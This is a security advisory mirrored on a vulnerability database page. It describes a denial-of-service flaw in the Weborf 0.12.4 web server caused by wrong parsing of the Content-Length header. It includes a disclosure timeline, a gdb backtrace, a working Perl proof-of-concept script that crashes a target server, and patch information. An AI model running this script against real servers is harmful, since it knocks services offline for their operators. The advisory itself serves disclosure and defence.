Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Weborf 0.12.4 Denial Of Service

🗓️ 07 Mar 2011 00:00:00Reported by ipaxType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 24 Views

Weborf 0.12.4 Denial of Service vulnerability in lightweight web serve

Code
`[Discussion]  
  
- DcLabs Security Research Group advises about the following vulnerability(ies):  
  
[Software]  
  
- Weborf-0.12.4 (Denial-of-Service)  
  
[Vendor Product Description]  
  
- Weborf is a lightweight webserver designed to rapidly share  
directories. Runs on POSIX systems.  
  
- Source: http://galileo.dmi.unict.it/wiki/weborf/lib/exe/fetch.php?media=download:weborf_0.12.4.tar.gz  
  
[Advisory Timeline]  
  
- 01/27/2011 -> Advisory sent to vendor.  
- 01/27/2011 -> Vendor response. (Requesting more information)  
- 01/27/2011 -> Full debug analysis and exploit sent.  
- 01/28/2011 -> Vendor response. (Acknowledged and fixed the bug)  
- 03/04/2011 -> Advisory published.  
  
[Bug Summary]  
  
- Wrong parsing in Content-Length entity-header.  
  
[Impact]  
  
- Low  
  
[Affected Version]  
  
- 0.12.4  
- Prior versions can also be affected but weren't tested.  
  
[Bug Description and Proof of Concept]  
  
- The webserver crashes due to an error when handling certain HTTP  
fields. This could be exploited to terminate an affected server via  
e.g. specially crafted HTTP headers containing wide characters.  
  
(gdb) bt  
#0 0xb7ec8bd1 in memcpy () from /lib/tls/i686/cmov/libc.so.6  
#1 0x0804dec5 in get_param_value (  
http_param=0x805af95 "HTTP/1.1\r\nHost:  
http://www.dclabs.com.br\r\nContent-Length0\r\n",  
parameter=0x804fe79 "Content-Length", buf=0xb3e46095 "", size=15,  
param_len=14) at utils.c:281  
#2 0x0804cfa1 in read_post_data (sock=0, connection_prop=0xb3e462f8,  
read_b=0xb3e462d4) at instance.c:1173  
#3 0x00000000 in ?? ()  
  
[PoC]  
  
# Weborf-0.12.4 (Denial of Service)  
#!/usr/bin/perl  
use IO::Socket;  
if (@ARGV < 1) {  
usage();  
}  
$ip = $ARGV[0];  
$port = $ARGV[1];  
print "[+] Sending request...\n";  
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr =>  
"$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n";  
print $socket "GET http://www.dclabs.com.br HTTP/1.1\r\n";  
print $socket "Host: http://www.dclabs.com.br\r\n";  
print $socket "Content-Length0\r\n\r\n";  
sleep(1);  
close($socket);  
print "[+] Done!\n";  
  
sub usage() {  
print "[-] Usage: <". $0 ."> <host> <port>\n";  
print "[-] Example: ". $0 ." 127.0.0.1 80\n";  
exit;  
}  
  
All flaws described here were discovered and researched by:  
Rodrigo Escobar aka ipax.  
DcLabs Security Research Group  
ipax (at) dclabs <dot> com <dot> br  
  
[Patch(s) / Workaround]  
  
Upgrade to the latest version at:  
http://galileo.dmi.unict.it/wiki/weborf/lib/exe/fetch.php?media=download:weborf_0.12.5.tar.gz  
  
[Greetz]  
DcLabs Security Research Group.  
  
--  
Rodrigo Escobar (ipax)  
Pentester/Researcher Security Team @ DcLabs  
http://www.dclabs.com.br  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
07 Mar 2011 00:00Current
7.4High risk
Vulners AI Score7.4
dclabs security research groupcontent-length parsinghttp headersdenial of serviceweborf-0.12.4posix systems
24